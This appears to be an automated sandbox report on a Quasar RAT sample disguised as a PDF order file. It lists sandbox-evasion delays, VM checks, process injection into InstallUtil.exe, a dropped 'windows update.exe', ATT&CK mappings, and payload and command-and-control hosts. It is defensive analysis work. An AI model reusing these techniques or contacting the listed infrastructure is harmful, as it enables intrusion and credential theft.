                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 528Thread sleep count: 7335 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -99886s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -99777s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -99672s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -99562s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -99453s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -99343s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -99234s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -99125s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -99016s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -98891s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -98766s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -98655s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -98547s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -98437s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -98328s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -98218s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -98076s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -97953s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -97844s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -97734s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -97625s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -97516s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -97402s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -97297s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -97187s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -97074s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -96969s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -96859s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -96750s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -96640s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -96531s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -96422s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -96312s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -96203s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -96093s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -95984s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -95875s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -95766s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -95656s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -95500s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -95378s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -95234s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -95125s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -95015s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -94906s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe TID: 652Thread sleep time: -94797s >= -30000sJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5168Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exe TID: 1412Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exe TID: 7104Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exe TID: 4996Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 100000Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 99886Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 99777Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 99672Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 99562Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 99453Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 99343Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 99234Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 99125Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 99016Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 98891Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 98766Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 98655Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 98547Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 98437Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 98328Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 98218Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 98076Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 97953Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 97844Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 97734Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 97625Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 97516Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 97402Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 97297Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 97187Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 97074Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 96969Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 96859Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 96750Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 96640Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 96531Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 96422Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 96312Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 96203Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 96093Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 95984Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 95875Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 95766Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 95656Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 95500Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 95378Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 95234Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 95125Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 95015Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 94906Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeThread delayed: delay time: 94797Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002998000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                  Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002998000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                  Source: Order88983273293729387293828PDF.exe, 00000000.00000002.2244498222.0000000005430000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                  Writes to foreign memory regions
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 720000Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 722000Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 1090008Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\AppData\Roaming\SubDir\windows update.exe "C:\Users\user\AppData\Roaming\SubDir\windows update.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeQueries volume information: C:\Users\user\Desktop\Order88983273293729387293828PDF.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeQueries volume information: C:\Users\user\AppData\Roaming\SubDir\windows update.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeQueries volume information: C:\Users\user\AppData\Roaming\SubDir\windows update.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\SubDir\windows update.exeQueries volume information: C:\Users\user\AppData\Roaming\SubDir\windows update.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\Order88983273293729387293828PDF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Quasar RAT
                  Source: Yara matchFile source: 0.2.Order88983273293729387293828PDF.exe.3d11660.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Order88983273293729387293828PDF.exe.3d11660.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.2233106739.0000000000720000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2218488393.0000000002C8D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2218488393.0000000002A39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.2233106739.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2255378258.00000000072E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2230725648.0000000003BE8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Order88983273293729387293828PDF.exe PID: 7092, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5948, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected Quasar RAT
                  Source: Yara matchFile source: 0.2.Order88983273293729387293828PDF.exe.3d11660.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.Order88983273293729387293828PDF.exe.3d11660.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.2233106739.0000000000720000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2218488393.0000000002C8D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2218488393.0000000002A39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.2233106739.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2255378258.00000000072E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2230725648.0000000003BE8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Order88983273293729387293828PDF.exe PID: 7092, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 5948, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                  Scheduled Task/Job                  		1
                  Scheduled Task/Job                  		211
                  Process Injection                  		1
                  Masquerading                  		OS Credential Dumping11
                  Security Software Discovery                  		Remote Services1
                  Archive Collected Data                  		11
                  Encrypted Channel                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/Job1
                  Registry Run Keys / Startup Folder                  		1
                  Scheduled Task/Job                  		1
                  Disable or Modify Tools                  		LSASS Memory1
                  Process Discovery                  		Remote Desktop ProtocolData from Removable Media1
                  Ingress Tool Transfer                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAt1
                  DLL Side-Loading                  		1
                  Registry Run Keys / Startup Folder                  		31
                  Virtualization/Sandbox Evasion                  		Security Account Manager31
                  Virtualization/Sandbox Evasion                  		SMB/Windows Admin SharesData from Network Shared Drive2
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                  DLL Side-Loading                  		211
                  Process Injection                  		NTDS1
                  Application Window Discovery                  		Distributed Component Object ModelInput Capture13
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                  Hidden Files and Directories                  		LSA Secrets12
                  System Information Discovery                  		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
                  Obfuscated Files or Information                  		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Software Packing                  		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  DLL Side-Loading                  		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1557778 Sample: Order8898327329372938729382... Startdate: 18/11/2024 Architecture: WINDOWS Score: 100 31 www.oleonidas.gr 2->31 33 oleonidas.gr 2->33 39 Found malware configuration 2->39 41 Malicious sample detected (through community Yara rule) 2->41 43 Multi AV Scanner detection for submitted file 2->43 45 9 other signatures 2->45 9 Order88983273293729387293828PDF.exe 15 2 2->9         started        13 windows update.exe 3 2->13         started        15 windows update.exe 3 2->15         started        signatures3 process4 dnsIp5 35 oleonidas.gr 185.78.221.73, 443, 49704 IPHOSTGRIpDomainGR Greece 9->35 47 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 9->47 49 Writes to foreign memory regions 9->49 51 Injects a PE file into a foreign processes 9->51 17 InstallUtil.exe 1 5 9->17         started        21 conhost.exe 13->21         started        23 conhost.exe 15->23         started        signatures6 process7 file8 29 C:\Users\user\AppData\...\windows update.exe, PE32 17->29 dropped 37 Hides that the sample has been downloaded from the Internet (zone.identifier) 17->37 25 windows update.exe 4 17->25         started        signatures9 process10 process11 27 conhost.exe 25->27         started       

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  Order88983273293729387293828PDF.exe37%ReversingLabsWin32.Trojan.Generic
                  Order88983273293729387293828PDF.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Roaming\SubDir\windows update.exe0%ReversingLabs

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  https://entityframework-extensions.net/md5-exception0%Avira URL Cloudsafe
                  https://bulk-operations.net$Microsoft.Data.SqlClient.SqlBulkCopyEThe0%Avira URL Cloudsafe
                  https://bulk-operations.net/pricing.0%Avira URL Cloudsafe
                  https://dapper-plus.net/pricing.0%Avira URL Cloudsafe
                  http://www.zzzprojects.com0%Avira URL Cloudsafe
                  https://www.oleonidas.gr0%Avira URL Cloudsafe
                  https://bulk-operations.net0%Avira URL Cloudsafe
                  https://dapper-plus.net/getting-started-mapping#instance-context-mapping.0%Avira URL Cloudsafe
                  https://dapper-plus.net#Oops0%Avira URL Cloudsafe
                  https://entityframework-extensions.net/)0%Avira URL Cloudsafe
                  https://entityframework-extensions.net/include-graph).0%Avira URL Cloudsafe
                  https://dapper-plus.net/getting-started-mapping#instance-context-mapping0%Avira URL Cloudsafe
                  https://entityframework-extensions.net/pricing.0%Avira URL Cloudsafe
                  nwamama.ydns.eu0%Avira URL Cloudsafe
                  https://www.oleonidas.gr/mansa/Vurfw.wav0%Avira URL Cloudsafe
                  http://entityframework-plus.net/0%Avira URL Cloudsafe
                  https://linqtosql-plus.net/pricing.0%Avira URL Cloudsafe
                  https://entityframework-extensions.net/md5-exceptionX0%Avira URL Cloudsafe
                  https://dapper-plus.net0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  oleonidas.gr
                  		185.78.221.73
                  		truefalse
                    		unknown
                    www.oleonidas.gr
                    		unknown
                    		unknownfalse
                      		unknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      https://www.oleonidas.gr/mansa/Vurfw.wavfalse
                      • Avira URL Cloud: safe
                      		unknown
                      nwamama.ydns.eutrue
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://api.ipify.org/Order88983273293729387293828PDF.exe, 00000000.00000002.2255378258.00000000072E1000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003BE8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2233106739.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                        		high
                        https://entityframework-extensions.net/md5-exceptionOrder88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://bulk-operations.netOrder88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://dapper-plus.net#OopsOrder88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003891000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://stackoverflow.com/q/14436606/23354Order88983273293729387293828PDF.exe, 00000000.00000002.2255378258.00000000072E1000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002998000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003BE8000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2254165352.0000000006A40000.00000004.08000000.00040000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.2233106739.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                          		high
                          https://dapper-plus.net/getting-started-mapping#instance-context-mapping.Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003891000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://github.com/mgravell/protobuf-netJOrder88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003BE8000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2254165352.0000000006A40000.00000004.08000000.00040000.00000000.sdmpfalse
                            		high
                            https://dapper-plus.net/pricing.Order88983273293729387293828PDF.exefalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://bulk-operations.net$Microsoft.Data.SqlClient.SqlBulkCopyETheOrder88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003891000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.nuget.org/packages/NetTopologySuite.IO.SqlServerBytes/Order88983273293729387293828PDF.exe, 00000000.00000002.2218488393.0000000002881000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003891000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://github.com/mgravell/protobuf-netOrder88983273293729387293828PDF.exe, 00000000.00000002.2230725648.0000000003BE8000.00000004.00000800.00020000.00000000.sdmp, Order88983273293729387293828PDF.exe, 00000000.00000002.2254165352.0000000006A40000.00000004.08000000.00040000.00000000.sdmpfalse
                                		high
